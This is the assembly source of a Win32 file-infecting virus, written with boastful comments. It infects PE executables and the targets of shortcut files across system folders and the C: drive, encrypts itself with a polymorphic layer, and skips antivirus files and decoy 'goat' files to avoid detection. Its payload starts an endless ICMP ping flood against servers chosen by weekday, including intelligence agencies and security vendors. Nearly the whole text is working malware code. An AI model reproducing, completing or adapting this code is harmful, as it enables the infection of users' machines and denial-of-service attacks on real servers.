lea eax , [ ebp+WSOCK]push eaxcall dword ptr [ ebp+XLoadLibraryA ]mov [ ebp+W32Handle ], eax
lea esi , [ ebp+Kernel32Names ]lea edi , [ ebp+XFindFirstFileA ]mov ebx , [ ebp+K32Handle ]push NumberOfKernel32APISpop ecxcall GetAPI3
lea esi , [ ebp+ImageHLPNames]lea edi , [ ebp+XCheckSumMappedFile ]mov ebx , [ ebp+IHLHandle ]xor ecx , ecxinc ecxcall GetAPI3
lea esi , [ ebp+ADVAPI32Names]lea edi , [ ebp+XRegOpenKeyExA]mov ebx , [ ebp+ADVHandle ]push 3dpop ecxcall GetAPI3
lea esi , [ ebp+WSOCK32Names]lea edi , [ ebp+Xsocket ]mov ebx , [ ebp+W32Handle ]push 3dpop ecxcall GetAPI3
; ************************************************* **************************; ------------------[ Outbreak ! Here we start infe cting ]-------------------; ************************************************* **************************
; Now we got everything we need to; start infecting some files *eg*; First of all we retrieve the; foldernames of the current folder,; the system folder, and the windows folder
; these are the folders we start to infectlea edi , [ ebp+curdir ]push edipush 7Fhcall dword ptr [ ebp+XGetCurrentDirectoryA ]
call genPoly ; before we infect anything, we; create a poly decryptor used for; all files we infect = slow poly !
mov [ ebp+InfCounter ], 10d ; Number of files we want to infect !call InfectCurDir ; first of all we infect the current directory
or ebp , ebp ; if this is the first generation, we infect justjz ExecuteHost ; the first directory ( makes it easier to infect
; just some files .. *g*; we also don't start the payload !
push 7Fh ; buffer - size; 7fh = 127d = max lenght of Directory name
lea edi , [ ebp+windir ] ; Pointer to the offset where we save the directorypush edicall dword ptr [ ebp+XGetWindowsDirectoryA ]
lea edi , [ ebp+windir ] ; then we infect the windows directorypush edicall dword ptr [ ebp+XSetCurrentDirectoryA ]mov [ ebp+InfCounter ], 10dcall InfectCurDir
; we save both directory's in the same bufferpush 7Fh ; so we save 127 Bytes of the Buffersizelea edi , [ ebp+windir ]push edicall dword ptr [ ebp+XGetSystemDirectoryA ]
lea edi , [ ebp+windir ] ; and the system directory ..push edicall dword ptr [ ebp+XSetCurrentDirectoryA ]mov [ ebp+InfCounter ], 10dcall InfectCurDir
; if everything went fine, we have; infected now up to 30 files !; Is this enough ?; ( please note that this is a rhetorical question *g* ); We want more !
; ************************************************* **************************; -----------------------[ Parse Directory's ]----- --------------------------; ************************************************* **************************
InitParsing :
mov [ ebp+InfCounter ], 30d ; let's parse some directorys for; 30 more files !
lea edi , [ ebp+RootDir ]call dword ptr [ ebp+XSetCurrentDirectoryA ]call ParseFolder
; if we are not able to access the registry we; infect another 20 Files in the System-Directory
cmp dword ptr [ ebp+XRegOpenKeyExA], 0hje InfectWinDirAgaincall GetStartMenue ; last but not least, we try to parse the
; start-menue folder ( follow the LNK's ); to get 20 more files; with some luck, we infect 100 files each run; all over the HD *g* ; I think this can be called successfull spreading *g*
lea edi , [ ebp+windir ]call dword ptr [ ebp+XSetCurrentDirectoryA ]
InfectWinDirAgain :mov [ ebp+InfCounter ], 20dcall ParseFolder ; let's parse the startmenue and follow all
; LNK-Files inside ;)
jmp PayLoad ; start the evil part of this thingie ..
ParseFolder :call InfectCurDir ; infect the current directorycmp [ ebp+InfCounter ], 0jbe EndParsing ; we infected enough ? ok, leave !
lea esi , [ ebp+Folders ]Call FindFirstFileProcinc eaxjz EndParsing ; If there are no directorys we returndec eax ; otherwise we save the handle
GetOtherDir :; first of all we check if this; is a valid directory
mov eax , dword ptr [ ebp+WFD_dwFileAttributes ]and eax , 10h ; if not we get the next jz NoThisOne ; one
lea esi , [ ebp+WFD_szFileName ]cmp byte ptr [ esi ], '.' ; we will not parse into . or ..je NoThisOne ; directorys
push 03hpop ecxcall GetRand
dec edx ; if division-rest (edx) = 1jz ParseNewDir ; we get this directory
NoThisOne :
call FindNextFileProc
test eax , eaxjnz GetOtherDir
EndParseDir2 : ; we close the search - Handle
mov eax , dword ptr [ ebp+FindHandle ]push eaxcall dword ptr [ ebp+XFindClose ]
EndParsing : ; we just returnret
ParseNewDir : ; we got a direcory, let's change to it; and infect it.. *eg*
mov eax , dword ptr [ ebp+FindHandle ]push eaxcall dword ptr [ ebp+XFindClose ]
lea esi , [ ebp+WFD_szFileName ]push esicall dword ptr [ ebp+XSetCurrentDirectoryA ]
jmp ParseFolder
; ************************************************* **************************; -----------------[ Let's get the Startmenue folde r ]-----------------------; ************************************************* **************************
GetStartMenue : ; Let's try to open HKEY_USERS registry Key
lea esi , [ ebp+RegHandle ]push esipush 001F0000h ; complete accesspush 0h ; reservedlea esi , [ ebp+SubKey]push esipush 80000003h ; HKEY_USERScall dword ptr [ ebp+XRegOpenKeyExA]
test eax , eax ; if we failed opening the key, we returnjnz NoStartMenue
; let's get the valuelea esi , [ ebp+BufferSize ]push esilea esi , [ ebp+windir ]push esilea esi , [ ebp+ValueType ]push esi ; Type of Valuepush 0 ; reservedlea esi , [ ebp+Value ]push esi ; ValueNamemov eax , [ ebp+RegHandle ]push eax ; Reg-Key Handlecall dword ptr [ ebp+XRegQueryValueExA ]
mov eax , dword ptr [ ebp+RegHandle ]push eaxcall dword ptr [ ebp+XRegCloseKey ]
NoStartMenue :
ret
SubKey db '.Default\Software\Microsoft\Windows\CurrentVersion \Explorer\Shell Folders' , 0Value db 'Start Menu' , 0ValueType dd 0h ; Type of registry ValueBufferSize dd 7Fh ; size of buffer
; ************************************************* **************************; ----------------[ API - Tables and some other dat a ]-----------------------; ************************************************* **************************
; Misc Data .. ;)Folders db '*.' , 0 ; search for directory'sRootDir db 'C:\',0 ; we want to start parsing at root o f Drive C:
; Here follow the tables of the api's we use; for our virus, if you want to know what they; do exactly simply check the Win32; Programmer's Reference; I won't explain them ( I think the names of them; makes it clear enough *g* )
Kernel32Names : ; 17d API's we want from Kernel32.dll
NumberOfKernel32APIS equ 17d
db 'FindFirstFileA' , 0db 'FindNextFileA' , 0db 'FindClose' , 0db 'CreateFileA' , 0db 'SetFileAttributesA' , 0db 'CloseHandle' , 0db 'CreateFileMappingA' , 0db 'MapViewOfFile' , 0db 'UnmapViewOfFile' , 0db 'GetWindowsDirectoryA' , 0db 'GetSystemDirectoryA' , 0db 'GetCurrentDirectoryA' , 0db 'SetCurrentDirectoryA' , 0db 'GetFileAttributesA' , 0db 'GetTickCount' , 0db 'CreateThread' , 0db 'GetSystemTime' , 0
ImageHLPNames:db 'CheckSumMappedFile' , 0h
ADVAPI32Names:db 'RegOpenKeyExA' , 0db 'RegQueryValueExA' , 0db 'RegCloseKey' , 0
WSOCK32Names:db 'socket' , 0db 'WSACleanup' , 0db 'WSAStartup' , 0db 'closesocket' , 0db 'sendto' , 0db 'setsockopt' , 0
; ************************************************* **************************; --------------[ Retrieve API's with GetProcAddres s ]-----------------------; ************************************************* **************************
; esi points to the Table of Names; edi to the offsets; ebx contains the module-handle; ecx the number of API's
GetAPI3 :push ecx ; save ecx
push esi ; push api-name push ebx ; Push Module-Handle
; call GetProcAddress
call dword ptr [ ebp+XGetProcAddress ]stosd ; store api-offset
pop ecx ; did we get them all ?dec ecxjz EndApi3 ; if yes then return
push ecx ; otherwise move esi to next API-Name
SearchZero : ; we search for the end of the currentcmp byte ptr [ esi ], 0hje GotZero ; api name ( always 0h ) and increaseinc esijmp SearchZero
GotZero :inc esipop ecx ; get ecx ( counter )
jmp GetAPI3 ; retrieve Next API
EndApi3 :ret
; ************************************************* **************************; --------------[ Search Kernel Export Table for AP I's ]---------------------; ************************************************* **************************
SearchAPI1 : ; In this procedure we search for the first 2 API's; clear the counter
and word ptr [ ebp+counter ], 0h
mov eax , [ ebp+KernelAddy ] ; Load the PE-Header Offset
mov esi , [ eax +78h ] ; Get Export Table Addressadd esi , [ ebp+MZAddy] ; normalize RVAadd esi , 1Ch ; skip not needed data
; now we gave the Address Table RVA-Offset in esi
lodsd ; Get Address Table RVAadd eax , [ ebp+MZAddy] ; convert to VA and save itmov dword ptr [ ebp+ATableVA ], eax
lodsd ; Get Name Pointer Table RVAadd eax , [ ebp+MZAddy] ; make it VA and save itmov dword ptr [ ebp+NTableVA ], eax
lodsd ; Get Ordinal Table RVAadd eax , [ ebp+MZAddy] ; guess what ? *g*mov dword ptr [ ebp+OTableVA ], eax
mov esi , [ ebp+NTableVA ] ; Get the Name Pointer Table Addy in esi
SearchNextApi1 :push esi ; Save Pointer Table
lodsdadd eax , [ ebp+MZAddy] ; make it VA
mov esi , eax ; API Name in the Kernel Export APImov edi , edx ; API we are looking forpush ecx ; save the size
cld ; Clear direction Flagrep cmpsb ; Compare itpop ecxjz FoundApi1 ; Are they equal ?
pop esi ; Get the Pointer Tableadd esi , 4h ; Set Pointer to the next apiinc word ptr [ ebp+counter ]cmp word ptr [ ebp+counter ], 2000hje NotFoundApi1jmp SearchNextApi1 ; test next API
FoundApi1 :pop esi ; clear stack ( we don't want buffer overflows
; ok, we want them, but not here *bg* )
movzx eax , word ptr [ ebp+counter ]shl eax , 1h ; multiply eax with 2
; Make eax Point to the right entry inside the; Ordinal Table
add eax , dword ptr [ ebp+OTableVA ]xor esi , esi ; clear esixchg eax , esi ; make esi point to the entrylodsw ; get Ordinal in AXshl eax , 2h ; eax * 4add eax , dword ptr [ ebp+ATableVA ]mov esi , eax ; esi points to the address RVAlodsd ; eax = address RVAadd eax , [ ebp+MZAddy] ; Make it VA
ret ; Return with API-Addy in eax
NotFoundApi1 :xor eax , eax ; We didn't find the API we need :(ret ; We set EAX to 0 to show we have to
; return to the host..
; ************************************************* **************************; -------------------[ Execute the original Program ]------------------------; ************************************************* **************************
ExecuteHost : ; Here we execute the original program
lea edi , [ ebp+curdir ] ; we return to the original directory..push edicall dword ptr [ ebp+XSetCurrentDirectoryA ]
or ebp , ebp ; if this is a virus of the first generationjz FirstGenHost ; we can't return to a host, so we
; stop this with ExitProcess..Error_ExecuteHost :
mov eax , dword ptr [ ebp+SEH_Save]push eaxmov fs :[ 0], esp
mov eax , 12345678h ; here we return toorg $- 4 ; the old entry pointretEIP dd 0h ; of the infected file
add eax , 12345678horg $- 4retBas dd 0h
jmp eax
FirstGenHost :push 0h ; Stop executing this stuff ( first Generationcall ExitProcess ; only )
OldEIP dd 0h ; Old Entry PointOldBase dd 0h ; Old Imagebase
NewEIP dd 0h ; New Entry Point ( points to our virus.. )
; ************************************************* **************************; ----------------[ We try to find the Kernel Addre ss ]----------------------; ************************************************* **************************
GetKernel : ; Here we try to retrieve the Kernel; set search range
mov byte ptr [ ebp+K32Trys ], 5h
GK1:cmp byte ptr [ ebp+K32Trys ], 00hjz NoKernel ; Did we pass our limit of 50 pages ?
call CheckMZSign ; Has this Page a DOS EXE-Header ?jnc CheckPE
GK2:sub esi , 10000h ; Get the next pagedec byte ptr [ ebp+K32Trys ]jmp GK1 ; Check it
CheckPE: ; Let's check if we really foundmov edi , [ esi +3Ch] ; the Kernel32.dll PE-Headeradd edi , esicall CheckPESign ; check for PE-Sign
jnc CheckDLL ; check for the DLL-Flagjmp GK2
CheckDLL :add edi , 16h ; check for the Dll-Flag mov bx , word ptr [ edi ] ; get characteristicsand bx , 0F000h ; we need just the Dll-Flagcmp bx , 02000hjne GK2 ; if it is no dll go on searching
KernelFound : ; we found the Kernel32.dllsub edi , 16h ; set edi to the PE - Headerxchg eax , edi ; save PE address in eaxxchg ebx , esi ; save MZ address in ebxcld
ret
NoKernel : ; if not found we don't set the carriage flagstcret ; return if not found
K32Trys db 5h ; Search-Range
; ************************************************* **************************; -----------------[ Infection of the current direc tory ]--------------------; ************************************************* **************************
InfectCurDir : ; Here we infect the files in the current directory; we use the FindFirstFile - FindNextFile API's; to scan all files for PE-Executables and; LNK-Files.
lea esi , [ ebp+filemask ]call FindFirstFileProc
inc eaxjz EndInfectCurDir1 ; If there are no files, we returndec eax
InfectCurDirFile :; filename in esi
lea esi , [ ebp+WFD_szFileName ]call InfectFile ; Try to infect it !
cmp [ ebp+InfCounter ], 0h ; if we infected enough filesjna EndInfectCurDir2 ; we return
call FindNextFileProc
test eax , eaxjnz InfectCurDirFile
EndInfectCurDir2 : ; we close the search - Handle
push dword ptr [ ebp+FindHandle ]call dword ptr [ ebp+XFindClose ]
EndInfectCurDir1 : ; we just returnret
InfCounter db 0h ; Counter for the number of files we infect; at max in the current directory; ( could take too long if we want to infect them; all )
FindHandle dd 0h ; The handle for the FindFirstFile API
filemask db '*.*' , 0 ; we search for all files, not just exe files
; these structures are nessecairy; for the FindFileFirst - FindFileNext API's
; ************************************************* **************************; ---------------------[ Prepare infection of file ]------------------------; ************************************************* **************************
InfectFile : ; Here we prepare to infect the file ; the filename is in [ebp+WFD_szFileName]; we open it and check if it is something; we are able to infect...; esi points to the filename..
cmp byte ptr [ esi ], '.' ; check if we got .. or .je NoInfection
; if the file is smaller than; 200 Bytes it will not get checked or; infected !
cmp dword ptr [ ebp+WFD_nFileSizeLow ], 200djbe NoInfection
; we also don't infect it if it is too bigcmp dword ptr [ ebp+WFD_nFileSizeHigh ], 0jne NoInfection
call CheckFileName ; check for AV-Filesjc NoInfection
; Get File-Attributeslea eax , [ ebp+WFD_szFileName ]push eaxcall dword ptr [ ebp+XGetFileAttributesA ]
; save themmov dword ptr [ ebp+Attributes ], eax
inc eaxjz NoInfection ; if we failed we don't infectdec eax
push 80h ; clean attributeslea eax , [ ebp+WFD_szFileName ]push eaxcall dword ptr [ ebp+XSetFileAttributesA ]or eax , eax ; if we fail, we don't open the filejz NoInfection ; if we have no access to set the attributes,
; we will surely not be allowed to change the file itself
call OpenFile ; open the filejc NoInfection ; if we failed we don't infect..
mov esi , eaxcall CheckMZSign ; if it is an EXE file, we go onjc CheckLNK ; otherwise we test if it is a LNK
cmp word ptr [ eax +3Ch], 0hje CheckLNK
xor esi , esi ; get the start of the PE-Headermov esi , [ eax +3Ch]
; if it lies outside the file we skip itcmp dword ptr [ ebp+WFD_nFileSizeLow ], esijb Notagoodfile
add esi , eax
mov edi , esicall CheckPESign ; check if it is an PE-Executablejc Notagoodfile
; check infection mark --> DDoS
; if it is there the file is already infected..
cmp dword ptr [ esi +4Ch], 'SoDD'jz Notagoodfile
mov bx , word ptr [ esi +16h ] ; get characteristicsand bx , 0F000h ; we need just the Dll-Flagcmp bx , 02000hje Notagoodfile ; we will not infect dll-files
mov bx , word ptr [ esi +16h ] ; get characteristics againand bx , 00002h ; we check if it is no OBJ or something else..cmp bx , 00002hjne Notagoodfile
call InfectEXE ; ok, infect it !; if there occoured an error; while mapping the file again,; we don't need to unmap & close it
jc NoInfectionjmp Notagoodfile
CheckLNK: ; check if we got an LNK-Filemov esi , dword ptr [ ebp+MapAddress ]cmp word ptr [ esi ], 'L' ; check for signjne UnMapFile ; if it is no LNK File we close it
call InfectLNK
Notagoodfile :call UnMapFile ; we store the file..
; we restore the file-attributes
push dword ptr [ ebp+Attributes ]lea eax , [ ebp+WFD_szFileName ]push eaxcall dword ptr [ ebp+XSetFileAttributesA ]
NoInfection :ret
; ************************************************* **************************; ------------------------[ Open and close Files ]- --------------------------; ************************************************* **************************
OpenFile :
xor eax , eax ; let's open the file push eaxpush eaxpush 3hpush eaxinc eaxpush eaxpush 80000000h or 40000000hpush esi ; name of filecall dword ptr [ ebp+XCreateFileA ]
inc eaxjz Closed ; if there is an error we don't infect the filedec eax ; now the handle is in eax
; we save it
mov dword ptr [ ebp+FileHandle ], eax
; if we map a file normal, we map it with the size; in the Find32-Data ; otherwise it is in ecx
mov ecx , dword ptr [ ebp+WFD_nFileSizeLow ]
CreateMap :push ecx ; save the size
xor eax , eax ; we create a map of the file topush eax ; be able to edit itpush ecxpush eaxpush 00000004hpush eaxpush dword ptr [ ebp+FileHandle ]call dword ptr [ ebp+XCreateFileMappingA ]
mov dword ptr [ ebp+MapHandle ], eax
pop ecx ; get the size again.. test eax , eax ; if there is an error we close the filejz CloseFile ; no infection today :(
xor eax , eax ; we map the file.. *bla*push ecxpush eaxpush eaxpush 2hpush dword ptr [ ebp+MapHandle ]call dword ptr [ ebp+XMapViewOfFile ]
or eax , eax ; if there is an error, we unmap itjz UnMapFile
; eax contains the offset where; our file is mapped.. *g*
mov dword ptr [ ebp+MapAddress ], eax; Clear c-flag for successful opening
clc
ret ; we successfully opened it !
UnMapFile : ; ok, unmap it
call UnMapFile2
CloseFile : ; let's close it
push dword ptr [ ebp+FileHandle ]call [ ebp+XCloseHandle ]
Closed :stc ; set carriage flag
ret
UnMapFile2 : ; we need to unmap it some times, to; map it again with more space..
push dword ptr [ ebp+MapAddress ]
call dword ptr [ ebp+XUnmapViewOfFile ]
push dword ptr [ ebp+MapHandle ]call dword ptr [ ebp+XCloseHandle ]
ret
; ************************************************* **************************; -------------------------[ Infect an EXE-FILE ]-- --------------------------; ************************************************* **************************
InfectEXE : ; MapAddress contains the starting offset of the fi le
; we will not infect exe files, which are smaller t han; 40 Kb, this is for avoiding goat files.; AV's use them to study viruses !
cmp dword ptr [ ebp+WFD_nFileSizeLow ] , 0A000hjb NoEXE
mov ecx , [ esi +3Ch] ; esi points to the PE-Header; ecx contains file-alignment; put size in eax
mov eax , dword ptr [ ebp+WFD_nFileSizeLow ]add eax , dword ptr [ ebp+VirLen ]
call Align ; align it and save the new sizemov dword ptr [ ebp+NewSize ], eaxxchg ecx , eax
pushad ; save registers; we close the file and map it again,; but this time we will load it; with some more space, so we can add; our code *eg*
call UnMapFile2popad
call CreateMap ; we map it again with a bigger size; if we got an error we return
jc NoEXE; make esi point to the PE-Header again; get offset
mov esi , dword ptr [ eax +3Ch]; make it VA
add esi , eaxmov edi , esi ; edi = esi
; eax = number of sectionsmovzx eax , word ptr [ edi +06h ]dec eaximul eax , eax , 28h ; multiply with size of section headeradd esi , eax ; make it VAadd esi , 78h ; make it point to dir table
; esi points now to the dir-table
mov edx , [ edi +74h ] ; get number of dir - entrysshl edx , 3h ; multiply with 8add esi , edx ; make point to the last section
; get the Entry Point and save it; we need it to be able to return
; to the original file
mov eax , [ edi +28h ]mov dword ptr [ ebp+OldEIP ], eax
; get the imagebase, also needed to; execute original file
mov eax , [ edi +34h ]mov dword ptr [ ebp+OldBase ], eax
mov edx , [ esi +10h ] ; size of raw data; we will increase it later
mov ebx , edxadd edx , [ esi +14h ] ; edx = Pointer to raw-data
push edx ; save it in stack
mov eax , ebxadd eax , [ esi +0Ch] ; make it VA
; this is our new EIP
mov [ edi +28h ], eaxmov dword ptr [ ebp+NewEIP], eax
mov eax , [ esi +10h ] ; get size of Raw-datapush eaxadd eax , dword ptr [ ebp+VirLen ]
; increase itmov ecx , [ edi +3Ch] ; Align it
call Align
; save it in the file as; new size of rawdata and
mov [ esi +10h ], eax
pop eax ; new Virtual sizeadd eax , dword ptr [ ebp+VirLen ]add eax , Buffersizemov [ esi +08h ], eax
pop edx
mov eax , [ esi +10h ]add eax , [ esi +0Ch] ; New Size of Image
; save it in the filemov [ edi +50h ], eax
; change section flags to make; us have write & read access to it; when the infected file is run; we also set the code flag.. ;)
or dword ptr [ esi +24h ], 0A0000020h; we write our infection mark to the program,; so we will not infect it twice; --> DDoS
mov dword ptr [ edi +4Ch], 'SoDD'push edi ; save thempush edx
push 10dpop ecxcall GetRand ; get random number ( we'll use the EAX value )
pop edi ; restore and xchangepop edx
mov word ptr [ ebp+Key], axpush eax ; save it 2 times
lea esi , [ ebp+Virus ] ; point to start of virusadd edi , dword ptr [ ebp+MapAddress ]push edi ; save edi
mov ecx , dword ptr [ ebp+VirLen ]; get size of virus in ecx
rep movsb ; append virus !
pop esi ; decrypt the virusmov edi , esiadd esi , NoCryptmov ecx , ( CryptSize / 2)
pop edx ; get key from stackpush edi ; save startmov edi , esi
EnCryptLoop : ; decrypt with second layerlodswnot axinc dxxchg dl , dhxor ax , dxxchg al , ahstoswloop EnCryptLoop
pop esi ; let's start decrypting with the second layeradd esi , 05h ; skip the callmov ecx , FirstLSize ; mov size to ecxmov edi , esimov edx , dword ptr [ ebp+CryptType ]xor eax , eax
XorEncrypt : ; we use a simple xordec edxjnz NegEncryptmov dl , byte ptr [ ebp+PolyKey ]
@Xor:lodsb
xor al , dlstosbloop @Xorjmp EndPolyCrypto
NegEncrypt :dec edxjnz NotEncrypt
@Neg:lodsb
neg alstosbloop @Negjmp End2LCrypto
NotEncrypt : ; not byte ptr [esi]dec edxjnz IncEncrypt
@Not:lodsb
not alstosbloop @Notjmp End2LCrypto
IncEncrypt : ; inc byte ptr [esi]dec edxjnz DecEncrypt
@Inc:lodsb
dec alstosbloop @Incjmp End2LCrypto
DecEncrypt : ; dec byte ptr [esi]lodsb
inc alstosbloop DecEncrypt
End2LCrypto :
dec byte ptr [ ebp+InfCounter ]
; if we succesfully received the dll and the; function, we create a checksum for the; file ( needed for dll's and WinNT )
cmp [ ebp+XCheckSumMappedFile ], 0hje NoCRC
lea esi , [ ebp+CheckSum]push esilea esi , [ ebp+HeaderSum]push esipush dword ptr [ ebp+NewSize ]push dword ptr [ ebp+MapAddress ]call dword ptr [ ebp+XCheckSumMappedFile ]
test eax , eax ; if this failed we don't savejz NoCRC ; the crc
mov eax , dword ptr [ ebp+MapAddress ]; eax points to the dos-stub
mov esi , [ eax +3Ch] ; esi points to PE-Headeradd esi , eax ; save CRC in header
mov eax , dword ptr [ ebp+CheckSum]mov [ esi +58h ], eax
NoCRC:ret
NoEXE: ; let's return and close the infected file; this will also write it to disk !
stcret
; ************************************************* **************************; ------------------------[ Infect an LNK-FILE ]--- --------------------------; ************************************************* **************************
InfectLNK : ; if we find a link file, we try to find the; file it points to. If it is a EXE File we are abl e; to infect, we do so; this will not work with NT-LNK-Files, there we wi ll; receive only the Drive, where the file is located
; ok, if a LNK is bigger than 1 Meg, it is none; we check .. ;)
cmp dword ptr [ ebp+WFD_nFileSizeLow ] , 0400hja NoLNK
; get the start addy in esi, and and the sizemov esi , dword ptr [ ebp+MapAddress ]mov ecx , dword ptr [ ebp+WFD_nFileSizeLow ]xor edx , edxadd esi , ecx ; we start checking at the end of the file
; for a valid filename in itCheckLoop :
cmp byte ptr [ esi ], 3ah ; we detect a filename by the 2 dots ( 3ah = : )jne LNKSearch ; in the Drive
inc edx ; there are 2 times 2 dots, when checking fromcmp edx , 2d ; the end of the LNK, we need the 2.ndje PointsDetected
LNKSearch : ; go on searchingdec esiloop CheckLoop
; if we end here, we did not find the two dots.. :(NoLNK:
ret
PointsDetected : ; we found the drive ( two dots ... *g* ) ; esi points to them, now we need to check; for the start of the name..
cmp byte ptr [ esi +1], 0h ; check if we got an entire path or just a je NoLNK ; single drive ( may happen in NT / 2k )
PointsDetected2 :dec esicmp byte ptr [ esi ], 0hje NameDetected
loop PointsDetected2 ; ecx still takes care, that we don't; search too far..
jmp NoLNK ; nothing found ? return..
NameDetected : ; ok, esi points now to the name of the file; so we try a FindFileFirst to get the information; first, we save the information in the WIN32_FIND_ DATA; then we try to find the file.
inc esipush esi ; save it
lea esi , [ ebp+WIN32_FIND_DATA]
lea edi , [ ebp+Buffer ] ; save the old WIN32_FIND_DATAmov ecx , 337d ; and some more datarep movsb
lea edi , [ ebp+WIN32_FIND_DATA]xor eax , eax ; clean this fieldmov ecx , 337drep stosb
pop esi
call FindFirstFileProc
inc eaxjz RestoreLNK ; If there are no files, we returndec eax
; otherwise we save the handle
; if we went here, we know the file exists; esi still points to the filename including the; directory, we save this in the win32_Find_DATA; field, because the name there contains no path
lea edi , [ ebp+WFD_szFileName ]mov ecx , 259d ; we just move 259 Bytes, so there is still a endin g
; Zero if the name is longer and we just get a simp le error; and not an SEH or some other shit
rep movsblea esi , [ ebp+WFD_szFileName ]call InfectFile ; esi points to the filename again, so we infect it ;)
push dword ptr [ ebp+LNKFindHandle ]call dword ptr [ ebp+XFindClose ]
RestoreLNK :lea edi , [ ebp+WIN32_FIND_DATA]lea esi , [ ebp+Buffer ] ; restore the old WIN32_FIND_DATAmov ecx , 337d ; and some other datarep movsb
ret ; return to find more files
LNKFindHandle dd 0h ; here we save the search-handle
; ************************************************* **************************; ---------------------[ The evil Part: the Payload ]------------------------; ************************************************* **************************
PayLoad : ; here we handle the payload of the virus *eg*
cmp dword ptr [ ebp+W32Handle ], 0jne ExecuteHost
cmp dword ptr [ ebp+XCreateThread ], 0je ExecuteHost ; we better check this, cause this api does not exi st in 2k
lea eax , [ ebp+SystemTime ] ; retrieve current date, time,.. whateverpush eaxcall dword ptr [ ebp+XGetSystemTime ]
lea esi , [ ebp+wDayOfWeek] ; get the dayxor eax , eaxlodsw
shl eax , 2h ; multiply with 4; get Target
lea esi , [ ebp+TargetTable ]add esi , eaxlea edi , [ ebp+Target_IP ] ; write IP to Destination Address Fieldmovsd
; we get a nice target for the payload; and create a new thread to fulfill it ;)
push offset threadID ; here we save the thread IDpush 0hpush 0hpush offset PingFlood ; here starts the code of the new threadpush 0hpush 0hcall dword ptr [ ebp+XCreateThread ]
jmp ExecuteHost ; we're finished, so we execute the host-file
PingFlood : ; this is the thread of the payload !; here are we doing the really evil thingies ;); we will start pinging a server ;P
lea eax , [ ebp+offset WSA_DATA]push eax ; where is it..push 0101h ; required versioncall dword ptr [ ebp+XWSAStartup ]
push 1 ; We want to use the icmp protocollpush 3 ; SOCK_STREAMpush 2 ; Address Formatcall dword ptr [ ebp+Xsocket ]
mov dword ptr [ ebp+ICMP_Handle ], eax
push 4 ; set the options ( timeout, not really; nessecairy in this case *g* )
lea eax , [ ebp+offset Timeout ]push eaxpush 1006hpush 0FFFFhpush eaxcall dword ptr [ ebp+Xsetsockopt ]
; we need to create a checksum for the packetlea esi , [ ebp+ICMP_Packet ] ; nothing serious just some additions
push 6 ; we do this for 6 wordspop ecx ; = 12 bytesxor edx , edx
CreateICMP_CRC : ; load onelodswmovzx eax , ax ; mov it to eax ( clean upper part of eax )add edx , eax ; add it to edx ( we just add them all )
loop CreateICMP_CRC
movzx eax , dx ; add the lower ( dx ) and the upper part ofshr edx , 16d ; edx together in eax
add eax , edx
movzx edx , ax ; save ax in edxshr eax , 16d ; mov upper part of eax to ax ( clean upper part )add eax , edx ; add old ax to new ax ( add upper part to lower pa rt )
not eax ; eax = - 1 * ( eax + 1 ); this is our checksum
mov word ptr [ ebp+ICMP_CRC], ax
push 16d ; get it out, we send our packet !lea eax , [ ebp+offset Info ]push eaxpush 0push 12dlea eax , [ ebp+offset ICMP_Packet ]push eaxpush dword ptr [ ebp+ICMP_Handle ]call dword ptr [ ebp+Xsendto ]
CloseSocket : ; close the socket, to stay stable ;)push dword ptr [ ebp+ICMP_Handle ]call dword ptr [ ebp+Xclosesocket ]call dword ptr [ ebp+XWSACleanup]
jmp PingFlood ; heh that was fun, let's do it again ;)
Timeout dd 100000d ; 10000 ms Timeout ( we don't really care about it *g* )Info :
dw 2hdw 0h
Target_IP db 0d, 0d, 0d, 0ddd 0h ; there we will fill in the target ip address ;)
ICMP_Packet db 8hdb 0h
ICMP_CRC dw 0h ; for the CRC Calculation of the pingdd 0hdd 0hdd 0h
ICMP_Handle dd 0h ; the handle of the open Socket
TargetTable : ; these are our targets; please note again, that i don't want to damage on e; of these servers ! I choose them because I think that; they will stand such an attack if anyone will eve r release this; into the wild !!!
db 62d , 156d , 146d , 231d ; Sunday = www.bundesnachrichtendienst.dedb 195d , 154d , 220d , 34d ; Monday = French Secret Service ( dgse.citeweb. net )db 216d , 122d , 8d, 245d ; Tuesday = www.avp.com ( AV )db 216d , 41d , 20d , 75d ; Wednesday = www.lockdown2000.comdb 194d , 252d , 6d, 47d ; Thursday = www.f-secure.com db 208d , 226d , 167d , 23d ; Friday = www.norton.comdb 205d , 178d , 21d , 3d ; Saturday = www.zonelabs.com
; ************************************************* **************************; -------------------------[ Align-Procedure ]----- --------------------------; ************************************************* **************************
; lets align the size..
; eax - size; ecx - base
Align :push edxxor edx , edxpush eaxdiv ecxpop eaxsub ecx , edxadd eax , ecxpop edx ; eax - new size
ret
; ************************************************* **************************; --------------------------[ FindFile Procedures ] --------------------------; ************************************************* **************************
FindFirstFileProc :lea eax , [ ebp+WIN32_FIND_DATA]push eaxpush esicall dword ptr [ ebp+XFindFirstFileA ]mov dword ptr [ ebp+FindHandle ], eax
ret
FindNextFileProc :lea edi , [ ebp+WFD_szFileName ]mov ecx , 276d ; we clear these fields !xor eax , eaxrep stosb
lea eax , [ ebp+WIN32_FIND_DATA]push eaxmov eax , dword ptr [ ebp+FindHandle ]push eaxcall dword ptr [ ebp+XFindNextFileA ]
ret
CheckFileName :pushadlea esi , [ ebp+WFD_szFileName ]mov edi , esimov ecx , 260d
ConvertLoop : ; Convert to upper caseslodsbcmp al , 96djb Convertcmp al , 123dja Convertor al , aljz EndConvertsub al , 32d
Convert :stosb
loop ConvertLoop
EndConvert :lea edi , [ ebp+WFD_szFileName ]lea esi , [ ebp+FileNames ]mov ecx , 3h
FileNameCheck : ; check for av-namespush ecx ; i don't want to infect themmov ecx , 260d
CheckON:lodsbrepnz scasbor ecx , ecxjnz AVFile
pop ecxinc esi
loop FileNameCheck
jmp EndFileNameCheck
AVFile :mov al , byte ptr [ esi ] ; check if the second char also matchescmp byte ptr [ edi ], alje GotAVFile
dec esijmp CheckON
GotAVFile :pop ecx ; clear stackpopadstc ; set carriage flag ret
EndFileNameCheck :popadclcret
FileNames db 'AV' ; we avoid these namesdb 'AN' ; so we will not infect an AV anddb 'DR' ; alert the user
;************************************************** **************************; ---------------------[ Checks for PE / MZ Signs ] --------------------------; ************************************************* **************************
; we check here for PE and MZ signs; to identify the Executable we want to infect; I do this a little bit different than usual *g*
CheckPESign :cmp dword ptr [ edi ], 'FP' ; check if greater or equal to PFjae NoPESign
cmp dword ptr [ edi ], 'DP' ; check if lower or equal to PDjbe NoPESign
clc ; all that's left is PEret
NoPESign :stc ; set carriage flagret
CheckMZSign :
cmp word ptr [ esi ], '[M'jae NoPESign
cmp word ptr [ esi ], 'YM'jbe NoPESign
clcret
ret
